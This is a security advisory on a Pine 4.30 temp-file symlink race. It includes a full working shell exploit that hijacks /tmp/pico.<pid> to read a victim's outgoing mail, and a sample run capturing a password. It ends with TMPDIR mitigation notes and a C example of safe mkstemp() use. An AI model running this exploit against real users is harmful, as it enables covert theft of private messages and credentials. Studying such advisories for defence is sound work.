COMMAND

    pine

SYSTEMS AFFECTED

    Pine Version 4.30 (or maybe other versions)

PROBLEM

    The following is based on a Hacksware Bug Report.  If the Pine
    settings are like the following:

        [x]  enable-alternate-editor-cmd
        [x]  enable-alternate-editor-implicitly
        editor                   = /usr/bin/vi

    Pine creates its temporary file in the /tmp directory with a  name
    like /tmp/pico.007292 (where 7292 is the pid of the running  pine
    process).

    You can simply symlink this file (/tmp/pico.<pid>) to another file
    that doesn't exist.  When the victim edits a message, the  victim's
    editor (vi) follows the symlink and creates that file.  By removing
    the symlink, creating your own temporary file in  its  place,  and
    making it writable to the victim, you can hijack his mail message.

    Exploit:

    #!/bin/sh
    # Grab local pine messages
    # Usage: ./mon_pine.sh <pid of pine process>
    # victim pine must use following settings
    #
    #  mat@hacksware.com
    #  http://hacksware.com
    #
    # [x]  enable-alternate-editor-cmd
    # [x]  enable-alternate-editor-implicitly
    # editor                   = /usr/bin/vi
    #
    
    PID=$1
    PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
    TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`
    echo PICO_FILE is $PICO_FILE
    
    #if $PICO_FILE and $TRASHCAN exists, remove them
    if test -f $PICO_FILE
    then
     rm -f $PICO_FILE
    fi
    if test -f $TRASHCAN
    then
     rm -f $TRASHCAN
    fi
    
    ln -s $TRASHCAN $PICO_FILE
    while :
    do
     if test -f $TRASHCAN
     then
      break
     fi
    done
    
    echo Victim is Editing Pine Message
    rm -f $PICO_FILE
    echo We replace temporary file
    touch $PICO_FILE
    chmod 777 $PICO_FILE
    echo "Get the message from "$PICO_FILE
    echo "^C to break tailer"
    tail -f $PICO_FILE

    Example:

    [mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep
     7292 pts/1    S      0:22 pine
    [mat@overheaven /tmp]$ sh mon_pine.sh 7292
    PICO_FILE is /tmp/pico.007292
    
    ... wait for victim to compose mail....
    
    Victim is Editing Mail
    We replace temporary file
    Get the message from /tmp/pico.007292
    ^C to break tailer
    
    Hello...
    
    Your new password is "greenbee"
    
    Don't let anyone know this...
    Thanks..

    Setting $TMP and $TMPDIR does not stop this!  This has been  tested
    under Solaris 8 with pine 4.30: with both $TMP and $TMPDIR set, Pine
    still writes to /tmp.

SOLUTION

    Some people tried this on their boxes and  couldn't  get  the  same
    result.  They had the TMP and TMPDIR environment  variables  set.
    Using 'strace' we can see Pine working with  temp  files  in  the
    directory specified by TMP and TMPDIR.  So, once again, TMP/TMPDIR
    trump the /tmp default.

    Sure, it would be nice if all apps were safe in their use of  temp
    files.  It would be nice if there was an easy,  portable  way  to
    ensure safe temp file operations (mkstemp()?), but in the meantime,
    don't panic.  Set safe values for TMP and TMPDIR and Pine  behaves
    well.  Note that, going by the Solaris 8 test above, this won't help
    you on Solaris.

    So many of these problems would just disappear  if  the  system's
    default  profile  had  something  like  "TMPDIR=$HOME"  or
    "TMPDIR=$HOME/tmp".  Pine is not really the problem.   The  real
    problem here is the use of '$$' (the process id) in temporary file
    name creation.  mkstemp(3) is there for a reason.
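    The pattern the SOLUTION section objects to ('$$' in the name, no
    O_EXCL on the open) next to the repair it recommends (mkstemp(3),
    with the temp directory taken from TMPDIR/TMP and sanity-checked),
    as an added C example.  This is not Pine's code and not part of the
    Hacksware report; the function names, the directory check and the
    /tmp/pico.XXXXXX template are this example's own assumptions.

```c
/* Added example (not Pine's code, not part of the Hacksware report):
 * the pid-based temp name pattern beside a mkstemp(3)-based replacement
 * that honours TMPDIR/TMP.  Function names are this example's own. */
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, half one: the name is a pure function of the pid
 * ("$$"), so anyone who can read the process list knows it in advance. */
int predictable_name(char *buf, size_t len, pid_t pid)
{
    return snprintf(buf, len, "/tmp/pico.%06d", (int)pid);
}

/* Vulnerable pattern, half two: O_CREAT without O_EXCL follows whatever
 * already sits at the path (a symlink included) and creates/truncates
 * the target.  Shown for contrast only; not used below. */
int unsafe_open(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Directory selection: TMPDIR, then TMP, then the /tmp default. */
const char *tmpdir_from_env(void)
{
    const char *names[] = { "TMPDIR", "TMP", NULL };
    for (int i = 0; names[i] != NULL; i++) {
        const char *v = getenv(names[i]);
        if (v != NULL && *v != '\0')
            return v;
    }
    return "/tmp";
}

/* Accept a directory that is owned by us or by root and is not
 * world-writable unless the sticky bit is set: /tmp at 1777 and
 * $HOME/tmp at 0700 both pass; another user's directory does not. */
int dir_is_acceptable(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != geteuid() && st.st_uid != 0)
        return 0;
    if ((st.st_mode & S_IWOTH) && !(st.st_mode & S_ISVTX))
        return 0;
    return 1;
}

/* Hardened creation: mkstemp() picks the name and opens it with
 * O_CREAT|O_EXCL, so a pre-planted symlink makes the open fail instead
 * of being followed.  Returns the open fd and writes the path to 'path'. */
int safe_tempfile(char *path, size_t len)
{
    const char *dir = tmpdir_from_env();
    struct stat fst, lst;
    mode_t old_mask;
    int fd;

    if (!dir_is_acceptable(dir))
        return -1;
    if (snprintf(path, len, "%s/pico.XXXXXX", dir) >= (int)len)
        return -1;

    old_mask = umask(077);   /* old libcs created 0666; be explicit */
    fd = mkstemp(path);
    umask(old_mask);
    if (fd < 0)
        return -1;

    /* Post-check: the path must still name the regular file we hold. */
    if (fstat(fd, &fst) != 0 || lstat(path, &lst) != 0 ||
        !S_ISREG(lst.st_mode) || fst.st_ino != lst.st_ino ||
        fst.st_dev != lst.st_dev || fst.st_uid != geteuid()) {
        close(fd);
        unlink(path);
        return -1;
    }
    return fd;
}

int main(void)
{
    char name[64], path[1024];
    predictable_name(name, sizeof name, getpid());
    printf("guessable name would be: %s\n", name);
    int fd = safe_tempfile(path, sizeof path);
    if (fd < 0) {
        perror("safe_tempfile");
        return 1;
    }
    printf("created %s (mode 0600)\n", path);
    close(fd);
    unlink(path);
    return 0;
}
```

    Run it as an unprivileged user with TMPDIR pointing at a 0700
    directory of your own and the created path lands there; with
    TMPDIR set to a world-writable directory without the sticky bit it
    refuses to create anything.  The post-check after mkstemp() is belt
    and braces: O_EXCL already defeats a pre-planted symlink, and the
    comparison against lstat() of the path additionally catches the
    directory being swapped underneath the process.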